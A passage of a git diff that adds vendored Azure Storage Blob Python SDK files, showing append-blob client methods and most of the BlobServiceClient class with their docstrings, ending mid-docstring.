greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. 
+ :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). + :rtype: dict(str, Any) + """ + options = self._append_block_options( + data, + length=length, + **kwargs + ) + try: + return self._client.append_blob.append_block(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _append_block_from_url_options( # type: ignore + self, copy_source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + **kwargs + ): + # type: (...) 
-> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + # If end range is provided, start range must be provided + if source_length is not None and source_offset is None: + raise ValueError("source_offset should also be specified if source_length is specified") + # Format based on whether length is present + source_range = None + if source_length is not None: + end_range = source_offset + source_length - 1 + source_range = 'bytes={0}-{1}'.format(source_offset, end_range) + elif source_offset is not None: + source_range = "bytes={0}-".format(source_offset) + + appendpos_condition = kwargs.pop('appendpos_condition', None) + maxsize_condition = kwargs.pop('maxsize_condition', None) + source_content_md5 = kwargs.pop('source_content_md5', None) + append_conditions = None + if maxsize_condition or appendpos_condition is not None: + append_conditions = AppendPositionAccessConditions( + max_size=maxsize_condition, + append_position=appendpos_condition + ) + source_authorization = kwargs.pop('source_authorization', None) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + source_mod_conditions = get_source_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'copy_source_authorization': source_authorization, + 'source_url': copy_source_url, + 'content_length': 0, + 'source_range': source_range, + 'source_content_md5': source_content_md5, + 'transactional_content_md5': None, + 'lease_access_conditions': access_conditions, + 'append_position_access_conditions': append_conditions, + 'modified_access_conditions': mod_conditions, + 'source_modified_access_conditions': source_mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + 'timeout': kwargs.pop('timeout', None)} + options.update(kwargs) + return options + + @distributed_trace + def append_block_from_url(self, copy_source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """ + Creates a new block to be committed as part of a blob, where the contents are read from a source url. + + :param str copy_source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int source_offset: + This indicates the start of the range of bytes (inclusive) that has to be taken from the copy source. + :param int source_length: + This indicates the end of the range of bytes that has to be taken from the copy source. + :keyword bytearray source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. 
If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the + AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. 
+ :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._append_block_from_url_options( + copy_source_url=self._encode_source_url(copy_source_url), + source_offset=source_offset, + source_length=source_length, + **kwargs + ) + try: + return self._client.append_blob.append_block_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _seal_append_blob_options(self, **kwargs): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + appendpos_condition = kwargs.pop('appendpos_condition', None) + append_conditions = None + if appendpos_condition is not None: + append_conditions = AppendPositionAccessConditions( + append_position=appendpos_condition + ) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + options = { + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'append_position_access_conditions': append_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def seal_append_blob(self, **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """The Seal operation seals the Append Blob to make it read-only. + + .. versionadded:: 12.4.0 + + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). 
Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). + :rtype: dict(str, Any) + """ + options = self._seal_append_blob_options(**kwargs) + try: + return self._client.append_blob.seal(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def _get_container_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) -> ContainerClient + """Get a client to interact with the blob's parent container. + + The container need not already exist. Defaults to current blob's credentials. + + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START get_container_client_from_blob_client] + :end-before: [END get_container_client_from_blob_client] + :language: python + :dedent: 8 + :caption: Get container client from blob object. + """ + from ._container_client import ContainerClient + if not isinstance(self._pipeline._transport, TransportWrapper): # pylint: disable = protected-access + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=self.container_name, + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_service_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_service_client.py new file mode 100644 index 0000000..bff232d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_service_client.py @@ -0,0 +1,740 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- + +import functools +import warnings +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, + TYPE_CHECKING, + TypeVar) + + +try: + from urllib.parse import urlparse +except ImportError: + from urlparse import urlparse # type: ignore + +from azure.core.paging import ItemPaged +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline import Pipeline +from azure.core.tracing.decorator import distributed_trace + +from ._shared.models import LocationMode +from ._shared.base_client import StorageAccountHostsMixin, TransportWrapper, parse_connection_str, parse_query +from ._shared.parser import _to_utc_datetime +from ._shared.response_handlers import return_response_headers, process_storage_error, \ + parse_to_internal_user_delegation_key +from ._generated import AzureBlobStorage +from ._generated.models import StorageServiceProperties, KeyInfo +from ._container_client import ContainerClient +from ._blob_client import BlobClient +from ._models import ContainerPropertiesPaged +from ._list_blobs_helper import FilteredBlobPaged +from ._serialize import get_api_version +from ._deserialize import service_stats_deserialize, service_properties_deserialize + +if TYPE_CHECKING: + from datetime import datetime + from ._shared.models import UserDelegationKey + from ._lease import BlobLeaseClient + from ._models import ( + ContainerProperties, + BlobProperties, + PublicAccess, + BlobAnalyticsLogging, + Metrics, + CorsRule, + RetentionPolicy, + StaticWebsite, + FilteredBlob + ) + +ClassType = TypeVar("ClassType") + + +class BlobServiceClient(StorageAccountHostsMixin): + """A client to interact with the Blob Service at the account level. + + This client provides operations to retrieve and configure the account properties + as well as list, create and delete containers within the account. + For operations relating to a specific container or blob, clients for those entities + can also be retrieved using the `get_client` functions. + + For more optional configuration, please click + `here `_. + + :param str account_url: + The URL to the blob storage account. Any other entities included + in the URL path (e.g. container or blob) will be discarded. This URL can be optionally + authenticated with a SAS token. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. 
If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_blob_service_client] + :end-before: [END create_blob_service_client] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with account url and credential. + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_blob_service_client_oauth] + :end-before: [END create_blob_service_client_oauth] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with Azure Identity credentials. + """ + + def __init__( + self, account_url, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + try: + if not account_url.lower().startswith('http'): + account_url = "https://" + account_url + except AttributeError: + raise ValueError("Account URL must be a string.") + parsed_url = urlparse(account_url.rstrip('/')) + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(account_url)) + + _, sas_token = parse_query(parsed_url.query) + self._query_str, credential = self._format_query_string(sas_token, credential) + super(BlobServiceClient, self).__init__(parsed_url, service='blob', credential=credential, **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + def _format_url(self, hostname): + """Format the endpoint URL according to the current location + mode hostname. + """ + return "{}://{}/{}".format(self.scheme, hostname, self._query_str) + + @classmethod + def from_connection_string( + cls, # type: Type[ClassType] + conn_str, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): # type: (...) -> ClassType + """Create BlobServiceClient from a Connection String. + + :param str conn_str: + A connection string to an Azure Storage account. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. + Credentials provided here will take precedence over those in the connection string. + :returns: A Blob service client. + :rtype: ~azure.storage.blob.BlobServiceClient + + .. admonition:: Example: + + .. 
literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START auth_from_connection_string] + :end-before: [END auth_from_connection_string] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient from a connection string. + """ + account_url, secondary, credential = parse_connection_str(conn_str, credential, 'blob') + if 'secondary_hostname' not in kwargs: + kwargs['secondary_hostname'] = secondary + return cls(account_url, credential=credential, **kwargs) + + @distributed_trace + def get_user_delegation_key(self, key_start_time, # type: datetime + key_expiry_time, # type: datetime + **kwargs # type: Any + ): + # type: (...) -> UserDelegationKey + """ + Obtain a user delegation key for the purpose of signing SAS tokens. + A token credential must be present on the service object for this request to succeed. + + :param ~datetime.datetime key_start_time: + A DateTime value. Indicates when the key becomes valid. + :param ~datetime.datetime key_expiry_time: + A DateTime value. Indicates when the key stops being valid. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: The user delegation key. + :rtype: ~azure.storage.blob.UserDelegationKey + """ + key_info = KeyInfo(start=_to_utc_datetime(key_start_time), expiry=_to_utc_datetime(key_expiry_time)) + timeout = kwargs.pop('timeout', None) + try: + user_delegation_key = self._client.service.get_user_delegation_key(key_info=key_info, + timeout=timeout, + **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + return parse_to_internal_user_delegation_key(user_delegation_key) # type: ignore + + @distributed_trace + def get_account_information(self, **kwargs): + # type: (Any) -> Dict[str, str] + """Gets information related to the storage account. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_account_info] + :end-before: [END get_blob_service_account_info] + :language: python + :dedent: 8 + :caption: Getting account information for the blob service. + """ + try: + return self._client.service.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def get_service_stats(self, **kwargs): + # type: (**Any) -> Dict[str, Any] + """Retrieves statistics related to replication for the Blob service. + + It is only available when read-access geo-redundant replication is enabled for + the storage account. + + With geo-redundant replication, Azure Storage maintains your data durable + in two locations. In both locations, Azure Storage constantly maintains + multiple healthy replicas of your data. The location where you read, + create, update, or delete data is the primary storage account location. + The primary location exists in the region you choose at the time you + create an account via the Azure Management Azure classic portal, for + example, North Central US. The location to which your data is replicated + is the secondary location. The secondary location is automatically + determined based on the location of the primary; it is in a second data + center that resides in the same region as the primary location. 
Read-only + access is available from the secondary location, if read-access geo-redundant + replication is enabled for your storage account. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: The blob service stats. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_stats] + :end-before: [END get_blob_service_stats] + :language: python + :dedent: 8 + :caption: Getting service stats for the blob service. + """ + timeout = kwargs.pop('timeout', None) + try: + stats = self._client.service.get_statistics( # type: ignore + timeout=timeout, use_location=LocationMode.SECONDARY, **kwargs) + return service_stats_deserialize(stats) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def get_service_properties(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Gets the properties of a storage account's Blob service, including + Azure Storage Analytics. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An object containing blob service properties such as + analytics logging, hour/minute metrics, cors rules, etc. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_properties] + :end-before: [END get_blob_service_properties] + :language: python + :dedent: 8 + :caption: Getting service properties for the blob service. + """ + timeout = kwargs.pop('timeout', None) + try: + service_props = self._client.service.get_properties(timeout=timeout, **kwargs) + return service_properties_deserialize(service_props) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def set_service_properties( + self, analytics_logging=None, # type: Optional[BlobAnalyticsLogging] + hour_metrics=None, # type: Optional[Metrics] + minute_metrics=None, # type: Optional[Metrics] + cors=None, # type: Optional[List[CorsRule]] + target_version=None, # type: Optional[str] + delete_retention_policy=None, # type: Optional[RetentionPolicy] + static_website=None, # type: Optional[StaticWebsite] + **kwargs + ): + # type: (...) -> None + """Sets the properties of a storage account's Blob service, including + Azure Storage Analytics. + + If an element (e.g. analytics_logging) is left as None, the + existing settings on the service for that functionality are preserved. + + :param analytics_logging: + Groups the Azure Analytics Logging settings. + :type analytics_logging: ~azure.storage.blob.BlobAnalyticsLogging + :param hour_metrics: + The hour metrics settings provide a summary of request + statistics grouped by API in hourly aggregates for blobs. + :type hour_metrics: ~azure.storage.blob.Metrics + :param minute_metrics: + The minute metrics settings provide request statistics + for each minute for blobs. + :type minute_metrics: ~azure.storage.blob.Metrics + :param cors: + You can include up to five CorsRule elements in the + list. If an empty list is specified, all CORS rules will be deleted, + and CORS will be disabled for the service. + :type cors: list[~azure.storage.blob.CorsRule] + :param str target_version: + Indicates the default version to use for requests if an incoming + request's version is not specified. + :param delete_retention_policy: + The delete retention policy specifies whether to retain deleted blobs. + It also specifies the number of days and versions of blob to keep. 
+        :type delete_retention_policy: ~azure.storage.blob.RetentionPolicy
+        :param static_website:
+            Specifies whether the static website feature is enabled,
+            and if so, indicates the index document and 404 error document to use.
+        :type static_website: ~azure.storage.blob.StaticWebsite
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :rtype: None
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_service.py
+                :start-after: [START set_blob_service_properties]
+                :end-before: [END set_blob_service_properties]
+                :language: python
+                :dedent: 8
+                :caption: Setting service properties for the blob service.
+        """
+        if all(parameter is None for parameter in [
+                analytics_logging, hour_metrics, minute_metrics, cors,
+                target_version, delete_retention_policy, static_website]):
+            raise ValueError("set_service_properties should be called with at least one parameter")
+
+        props = StorageServiceProperties(
+            logging=analytics_logging,
+            hour_metrics=hour_metrics,
+            minute_metrics=minute_metrics,
+            cors=cors,
+            default_service_version=target_version,
+            delete_retention_policy=delete_retention_policy,
+            static_website=static_website
+        )
+        timeout = kwargs.pop('timeout', None)
+        try:
+            self._client.service.set_properties(props, timeout=timeout, **kwargs)
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    @distributed_trace
+    def list_containers(
+            self, name_starts_with=None,  # type: Optional[str]
+            include_metadata=False,  # type: Optional[bool]
+            **kwargs
+        ):
+        # type: (...) -> ItemPaged[ContainerProperties]
+        """Returns a generator to list the containers under the specified account.
+
+        The generator will lazily follow the continuation tokens returned by
+        the service and stop when all containers have been returned.
+
+        :param str name_starts_with:
+            Filters the results to return only containers whose names
+            begin with the specified prefix.
+        :param bool include_metadata:
+            Specifies that container metadata be returned in the response.
+            The default value is `False`.
+        :keyword bool include_deleted:
+            Specifies that deleted containers be returned in the response. This is for accounts
+            with container restore enabled. The default value is `False`.
+            .. versionadded:: 12.4.0
+        :keyword bool include_system:
+            Flag specifying that system containers should be included.
+            .. versionadded:: 12.10.0
+        :keyword int results_per_page:
+            The maximum number of container names to retrieve per API
+            call. If the request does not specify, the server will return up to 5,000 items.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: An iterable (auto-paging) of ContainerProperties.
+        :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.ContainerProperties]
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_service.py
+                :start-after: [START bsc_list_containers]
+                :end-before: [END bsc_list_containers]
+                :language: python
+                :dedent: 12
+                :caption: Listing the containers in the blob service.
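+
+        A minimal sketch of the same pattern outside the bundled samples
+        (``service`` is assumed to be an authenticated BlobServiceClient and
+        the prefix is a placeholder):
+
+        .. code-block:: python
+
+            for container in service.list_containers(name_starts_with="logs-"):
+                print(container.name)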
+ """ + include = ['metadata'] if include_metadata else [] + include_deleted = kwargs.pop('include_deleted', None) + if include_deleted: + include.append("deleted") + include_system = kwargs.pop('include_system', None) + if include_system: + include.append("system") + + timeout = kwargs.pop('timeout', None) + results_per_page = kwargs.pop('results_per_page', None) + command = functools.partial( + self._client.service.list_containers_segment, + prefix=name_starts_with, + include=include, + timeout=timeout, + **kwargs) + return ItemPaged( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + page_iterator_class=ContainerPropertiesPaged + ) + + @distributed_trace + def find_blobs_by_tags(self, filter_expression, **kwargs): + # type: (str, **Any) -> ItemPaged[FilteredBlob] + """The Filter Blobs operation enables callers to list blobs across all + containers whose tags match a given search expression. Filter blobs + searches across all containers within a storage account but can be + scoped within the expression to a single container. + + :param str filter_expression: + The expression to find blobs whose tags matches the specified condition. + eg. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'" + To specify a container, eg. "@container='containerName' and \"Name\"='C'" + :keyword int results_per_page: + The max result per page when paginating. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.FilteredBlob] + """ + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.service.filter_blobs, + where=filter_expression, + timeout=timeout, + **kwargs) + return ItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=FilteredBlobPaged) + + @distributed_trace + def create_container( + self, name, # type: str + metadata=None, # type: Optional[Dict[str, str]] + public_access=None, # type: Optional[Union[PublicAccess, str]] + **kwargs + ): + # type: (...) -> ContainerClient + """Creates a new container under the specified account. + + If the container with the same name already exists, a ResourceExistsError will + be raised. This method returns a client with which to interact with the newly + created container. + + :param str name: The name of the container to create. + :param metadata: + A dict with name-value pairs to associate with the + container as metadata. Example: `{'Category':'test'}` + :type metadata: dict(str, str) + :param public_access: + Possible values include: 'container', 'blob'. + :type public_access: str or ~azure.storage.blob.PublicAccess + :keyword container_encryption_scope: + Specifies the default encryption scope to set on the container and use for + all future writes. + + .. versionadded:: 12.2.0 + + :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_create_container] + :end-before: [END bsc_create_container] + :language: python + :dedent: 12 + :caption: Creating a container in the blob service. 
+ """ + container = self.get_container_client(name) + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + container.create_container( + metadata=metadata, public_access=public_access, timeout=timeout, **kwargs) + return container + + @distributed_trace + def delete_container( + self, container, # type: Union[ContainerProperties, str] + lease=None, # type: Optional[Union[BlobLeaseClient, str]] + **kwargs + ): + # type: (...) -> None + """Marks the specified container for deletion. + + The container and any blobs contained within it are later deleted during garbage collection. + If the container is not found, a ResourceNotFoundError will be raised. + + :param container: + The container to delete. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :param lease: + If specified, delete_container only succeeds if the + container's lease is active and matches this ID. + Required if the container has an active lease. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_delete_container] + :end-before: [END bsc_delete_container] + :language: python + :dedent: 12 + :caption: Deleting a container in the blob service. + """ + container = self.get_container_client(container) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + container.delete_container( # type: ignore + lease=lease, + timeout=timeout, + **kwargs) + + @distributed_trace + def _rename_container(self, name, new_name, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Renames a container. + + Operation is successful only if the source container exists. + + :param str name: + The name of the container to rename. + :param str new_name: + The new container name the user wants to rename to. + :keyword lease: + Specify this to perform only if the lease ID given + matches the active lease ID of the source container. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. 
